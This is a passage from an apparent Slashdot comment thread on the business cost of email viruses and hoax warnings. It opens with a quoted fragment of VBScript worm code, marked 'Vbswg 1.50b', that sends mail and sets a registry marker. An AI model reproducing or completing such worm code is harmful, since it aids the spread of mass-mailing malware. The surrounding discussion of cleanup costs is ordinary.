iq72b483v3Z.Send
E7O3tH65p4P.regwrite "HKCU\software\OnTheFly\mailed", "1"
End If
Next
End If
Next
end if
End Function
'Vbswg 1.50b
</BLOCKQUOTE>
It can cost a lot... (Score:5)
Take today for example..that big new scary
As for costs... I know when I Luv You hit many businesses were without email for DAYS. It took several admins hours and hours to clear out the systems, which costs a lot of money. Plus lost productivity from users. I don't think we'll get hit by another one like that again, hopefully admins learned their lesson.
If you're not blocking
Virus cost: (Score:5)
How much do virus *myths* cost businesses? (Score:5)
As a sysadmin at a small-ish company, I get dozens of bogus virus warning e-mail messages per week. That's not the problem, though. It's when they pass the message on to the company at large because they don't think I'm taking it seriously enough. It's the "I've got a virus/get me a new computer" mentality when they've downloaded too much pr0n.
argh! [ridiculopathy.com]